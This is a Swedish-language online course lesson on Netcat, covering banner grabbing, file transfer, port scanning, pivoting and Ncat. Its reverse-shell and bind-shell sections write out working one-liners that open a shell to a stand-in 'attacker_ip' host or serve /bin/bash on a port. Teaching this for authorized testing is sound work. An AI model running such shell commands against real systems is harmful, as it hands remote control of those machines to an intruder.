Cyber Security Academy · Lektion

Netcat: den schweiziska armékniven

Använd nc för banneridentifiering, filöverföring, portvidarebefordran och enkla omvända skal.

Lektion 3 av 413 steg

Netcat: den schweiziska armékniven är en gratis lektion i Cyber Security Academy på CoddyKit. Detta är lektion 3 av 4. Du kan läsa vilka 3 lektioner som helst i den här lärvägen kostnadsfritt i sin helhet – därefter låser CoddyKit PRO upp alla lektioner, plus praktisk övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Den ingår i lärvägen för Cyber Security Academy, och Era framsteg synkroniseras mellan webben och CoddyKit-appen. Kursen i Cyber Security Academy innehåller totalt 4 lektioner.

Vad är Netcat?

Netcat (nc) är ett verktyg som läser och skriver data över nätverksanslutningar med TCP eller UDP. Det är installerat på nästan alla Unix-system och är ovärderligt för felsökning, filöverföring och grundläggande exploatering.

Grundläggande anslutning och banner grabbing

Anslut till valfri TCP-port för att hämta tjänstebannern och interagera manuellt med protokollet. Detta är den enklaste formen av rekognosering.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

Lyssna på en port

Netcat kan lyssna efter inkommande anslutningar med -l -p. Det är användbart för att testa anslutningar, fånga reverse shells och ta emot filer.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

Filöverföring med Netcat

Netcat kan skicka filer genom att leda dem in i en anslutning. Mottagaren lyssnar och omdirigerar utdata till en fil. Ingen kryptering — använd endast i betrodda nätverk.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

Portskanning med Netcat

Netcat kan utföra grundläggande portskanning med -z (läge utan I/O) och -w (timeout). Det är långsammare än Nmap men användbart när Nmap inte är tillgängligt.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

Enkelt reverse shell

Ett reverse shell får målet att ansluta tillbaka till angriparen. Det är användbart vid penetrationstester när brandväggsregler blockerar inkommande anslutningar till målet.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

Bind shell

Ett bind shell lyssnar på måldatorn. Angriparen ansluter till det. Det är mindre vanligt i moderna penetrationstester eftersom brandväggar vanligtvis blockerar inkommande anslutningar.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

UDP-läge

Använd -u för UDP-anslutningar. Det är användbart för att testa UDP-tjänster som DNS (port 53) och SNMP (port 161).

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

Proxying med Netcat

Netcat kan kedja anslutningar för att pivotera genom nätverk. Tillsammans med namngivna pipes (mkfifo) skapar det enkla tvåvägstunnlar utan ytterligare verktyg.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Ncat: det moderna alternativet

Ncat (en del av Nmap) utökar Netcat med SSL-stöd (--ssl), åtkomstkontroll och broker-läge. Föredra Ncat för krypterade kanaler.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

Försvarare: upptäcka Netcat

Netcat-anslutningar ser ut som normala TCP-anslutningar. Försvarare upptäcker dem genom övervakning av processnamn (HIDS), ovanliga utgående portar och skal som startas från oväntade överordnade processer.

Snabbkontroll

Vilken Netcat-flagga aktiverar lyssningsläge?

Sammanfattning: Netcat

Netcat är ett grundläggande verktyg: använd det för banner grabbing, filöverföring, anslutningstester och för att förstå hur reverse shells och bind shells fungerar. Vid auktoriserade penetrationstester validerar det brandväggsregler och simulerar angripares pivotering. Lär er verktyget väl — både för att använda det och för att upptäcka det.

Gratis att börja

Lär dig Cyber Security Academy med en AI-lärare – gratis

Skriv och kör riktig kod i webbläsaren, få omedelbar hjälp av en AI-lärare dygnet runt och fortsätt där du slutade – på webben eller i appen.

Kurser
76
Lektioner
303

Vanliga frågor

Är lektionen ”Netcat: den schweiziska armékniven” gratis?

Ja – du kan läsa vilka 3 lektioner som helst i lärvägen Cyber Security Academy, inklusive ”Netcat: den schweiziska armékniven”, kostnadsfritt i sin helhet här på webben. Därefter låser CoddyKit PRO upp alla lektioner, plus interaktiv övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Kursen i Cyber Security Academy innehåller totalt 4 lektioner.

Vad lär jag mig i ”Netcat: den schweiziska armékniven”?

Använd nc för banneridentifiering, filöverföring, portvidarebefordran och enkla omvända skal. Ni övar på Cyber Security Academy med praktisk kod som körs direkt i webbläsaren, medan en AI-handledare som är tillgänglig dygnet runt svarar på Era frågor under lektionen.

Behöver jag någon erfarenhet för att börja lära mig Cyber Security Academy?

Du behöver inga förkunskaper. Utbildningen i Cyber Security Academy på CoddyKit är upplagd för allt från nybörjare till avancerade elever, så att du kan börja här eller från början och gå fram i din egen takt. Detta är lektion 3 av 4.

Hur lång tid tar lektionen ”Netcat: den schweiziska armékniven”?

De flesta CoddyKit-lektioner tar cirka 5–10 minuter. Varje lektion är kort och interaktiv, så att du gör stadiga framsteg och kan fortsätta precis där du slutade – på webben eller i appen.

Kan jag skriva och köra kod i den här Cyber Security Academy-lektionen?

Ja. Varje Cyber Security Academy-lektion innehåller en inbyggd kodredigerare, så att du kan skriva och köra riktig kod direkt i webbläsaren och få omedelbar AI-feedback – utan lokal installation.

Alla lektioner i den här kursen

  1. Tekniker för portskanning med Nmap
  2. Fingeravtrycksidentifiering av tjänster och operativsystem
  3. Netcat: den schweiziska armékniven
  4. Skript för nätverksenumerering
← Tillbaka till Cyber Security Academy